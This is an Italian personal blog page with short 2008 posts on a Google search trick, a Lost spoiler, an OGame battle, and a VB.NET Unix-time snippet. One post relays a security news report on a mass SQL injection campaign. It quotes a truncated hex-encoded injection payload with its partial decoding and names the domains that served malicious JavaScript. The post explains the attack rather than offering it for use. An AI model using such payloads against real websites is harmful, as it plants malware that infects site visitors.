Filtrare i risultati di Google in base alla data
28 04 2008E’ possibile con un piccolo trucco verificare gli aggiornamenti apportati da google ai risultati di una ricerca in un periodo che varia tra le ultime 24 ore e l’ultimo anno.
Basta effettuare la query normalmente e aggiungere in coda all’url risultante il parametro &as_qdr=d
Ad esempio, la ricerca site:andreafortuna.wordpress.com per verificare le pagine del mio blog indicizzate da google viene effettuata con questo url:
http://www.google.it/search?hl=it&q=site%3Aandreafortuna.wordpress.com&btnG=Cerca+con+Google&meta=
aggiungendo i parametri diventa cosi’
Ricaricando la pagina apparira’ un menu’ a scomparsa con la scelta del filtro da applicare
Commenti : Lascia un commento »
Tag: Google, Tips
Categorie : Google
Lost, Season 4 Episode 9
28 04 2008E’ scritto anche sui pacchetti di sigarette: IL FUMO UCCIDE!
(ebbene si, sono un bastardo spoileratore!) 
Commenti : Lascia un commento »
Tag: Lost, spoiler
Categorie : Lost
[OGame] Cronaca di una disfatta annunciata
27 04 2008Post ad uso e consumo dei ‘malati’ di Ogame e dei colleghi dell’alleanza ‘Vipers’, Universo 35. 
Sabato tranquillo a Caprica, pianeta madre del mio impero.
Le miniere lavorano a pieno ritmo, puntando alla realizzazione della Fabbrica dei Naniti di livello 2, e i laboratori di ricerca spingono verso il completamento della Tecnologia Gravitonica.
Tranquillità rotta dalla comunicazione del controllo spaziale, che segnala l’arrivo di una flotta dal pianeta XXX, coordinate 1.54.XX.
Scopo della visita, tanto per cambiare, Attacco!
La flotta in questione non è assolutamente da sottovalutare: 400 Navi da Battaglia, 80 Corazzate 230 Incrociatori da Battaglia.
Il mio gruppetto di navi da battaglia miste a piccoli incrociatori non ha alcuna possibilità di contrastare un tale volume di fuoco, e anche un controllo con lo SpeedSim mi conferma la triste realtà: a prescindere da come decida di impostare la difesa, in ogni caso la mia piccola flotta verrebbe spazzata via e il mio pianeta saccheggiato.
Sto per dare ordine alla flotta di caricare tutto il possibile e ritirarsi su una delle colonie vicine quando l’occhio mi cade su una voce rapporto dello speedsim: “Possibilità che si formi una luna dai detriti: 35%“.
Il trentacinque per cento non è un valore molto alto, ma la probabilità non è assolutamente da escludere. Ci penso un attimo e decido di tentare l’impossibile: sacrifico la flotta e tento di realizzare una luna.
Faccio decollare quindi 10 carghi pesanti con tutte le (poche) risorse del pianeta alla volta delle colonie in galassia 9, spengo tutte le miniere (non voglio produrre niente che l’attaccante possa portarsi via), faccio partire un po’ di riciclatrici dalla colonia vicina e mi metto in attesa, come Napoleone a Waterloo, della grande battaglia.
Le flotte sono una di fronte all’altra in orbita a 04-26 18:13:50 , ed ecco giungere alla battaglia:
il tutto si risolve in 4 turni, durante i quali la mia bella flotta viene spazzata via e ridotta a un cumulo di detriti in orbita geostazionaria attorno al pianeta.
Mentre a terra iniziano i lavori di ricostruzione delle infrastrutture distrutte dall’attacco l’occhio è rivolto sempre al cielo, in attesa che l’attrazione gravitazionale faccia il suo lavoro trasformando quello che resta delle eroiche flotte in un comodo satellite artificiale, dando quindi un senso al loro sacrificio.
Niente da fare: pochi minuti dopo giungono nell’orbita le mie riciclatrici che, sgomitando con quelle lanciate dall’attaccante, fanno piazza pulita dei detriti…sarà per un’altra volta.
Commenti : 3 Commenti »
Tag: Humor, OGame
Categorie : Humor, OGame
links for 2008-04-25
25 04 2008-
Finalmente l’applicazione ufficiale in J2ME: tariffe non proprio convenienti tuttavia!
Commenti : Lascia un commento »
Categorie : Generici
SQL Injection di massa: nmidahena.com, aspder.com e nihaorr1.com
24 04 2008Interessante questa notizia presente sul sito di F-Secure: sarebbe in atto un ‘attacco’ che, sfruttando la SQL Injection, altera i campi di testo dei database di backend dei siti web vulnerabili ‘inettando’ codice html necessario al caricamente di un codice javascript ‘malevolo’.
La stima di F-Secure realizzata cercando su Google la stringa ‘iniettata’ è di circa 510.000 pagine ‘infettate’ e effettivamente, riproducendo la query di ricerca il risultato si attesta sulle 502.000 pagine.
Come avviene l’infezione? Continuo a citare:
Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…Which when decoded becomes:
DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35
or b…
Il codice SQL eseguito comporterebbe appunto la modifica di tutti i campi di testo del database (solitamente utilizzati per archiviare i contenuti del sito) ai quali viene aggiunto un link a un file javascript hostato su 3 diversi domini (nmidahena.com, aspder.com and nihaorr1.com, attualmente non raggiungibili)
Lo script avvia il caricamento dei file necessari ad utilizzare differenti exploit con lo scopo di installare un trojan sui client che incappano nel sito infetto.
Da PandaLabs cito l’elenco di vulnerabilità che il codice malevolo cerca di utilizzare per l’installazione del trojan:
MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution
MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution
MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution
MS07-033 Cumulative Security Update for Internet Explorer
MS07-055 Vulnerability in kodak Image Viewer Could Allow Remote Code Execution
[via F-Secure]
Commenti : 1 Commento »
Tag: IIS, Infection, security, SQL Injection
Categorie : Sicurezza
VB.NET Tips: calcolare lo UnixTime
22 04 2008Attualmente al framework .NET manca una cosa abbastanza utile: non esiste una funzione che restituisca lo unixtime attuale.
Lo UnixTime, vi ricordo, e’ l’unita’ di misura del tempo utilizzata nei sistemi UnixLike e rappresenta il numero di secondi che sono trascorsi dalla mezzanotte (UTC) dell’1 gennaio 1970.
Questo breve code snippet permette di calcolare tale valore:
unixtime = (DateTime.UtcNow - New DateTime(1970, 1, 1, 0, 0, 0)).TotalSeconds
Commenti : Lascia un commento »
Categorie : Programmazione, VB.NET
links for 2008-04-20
20 04 2008-
Tool online per la creazione di Loghi. Gratuito.
Commenti : Lascia un commento »
Categorie : Generici
